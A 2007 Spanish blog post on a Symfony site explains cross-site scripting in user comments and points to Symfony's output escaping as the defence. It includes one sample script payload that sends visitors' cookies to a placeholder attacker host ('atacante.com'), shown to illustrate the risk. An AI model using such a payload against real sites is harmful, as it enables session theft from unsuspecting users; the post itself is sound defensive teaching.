Symfony y los ataques XSS

Las aplicaciones web que permiten a los usuarios introducir datos deben ser especialmente cuidadosas con la forma en la que procesan y muestran esos datos. Si no se toman las precauciones oportunas, se pueden producir ataques de tipo XSS (cross-site scripting). El sitio Zend Developer Zone publica un artículo muy interesante sobre este tipo de ataques.

Imagina que la aplicación permite a los usuarios introducir comentarios en los artículos mediante un <textarea>, y entra un usuario malicioso que introduce lo siguiente:


<script>;
document.write('<script src="http://www.atacante.com/get_cookies?cookies='
document.write(document.cookie)
document.write('"></script>');
</script>


Si la aplicación no tiene en cuenta que los usuarios pueden introducir este tipo de datos y muestra directamente el contenido de ese comentario, el resultado es que cualquier usuario que acceda a la página enviará el contenido de su cookie al servidor del atacante.

El artículo completo explica (en inglés) más detalladamente estos ataques XSS e incluye posibles soluciones.

Symfony por defecto está expuesto a algunos ataques de tipo XSS, tal y como se explica en su documentación oficial. En concreto, el capítulo 7 del libro de Symfony explica el mecanismo de escape que incluye Symfony para evitar los ataques de tipo XSS y las opciones disponibles.

Fuente: Avoiding XSS security attacks to sites that use HTML editors

Comentarios

Este artículo ya no permite añadir más comentarios.
¿Por qué? Los artículos cierran sus comentarios automáticamente unos meses después de su publicación para asegurar que estos sigan siendo relevantes.

Compartir en

Publicada el

7 de marzo de 2007

Etiquetas

Proyectos Symfony destacados

La forma más sencilla de generar el backend de tus aplicaciones Symfony. Ver más

Descargas totales de Symfony

1.069.955.393

Ver descargas en tiempo real

Síguenos en @symfony_es para acceder a las últimas noticias.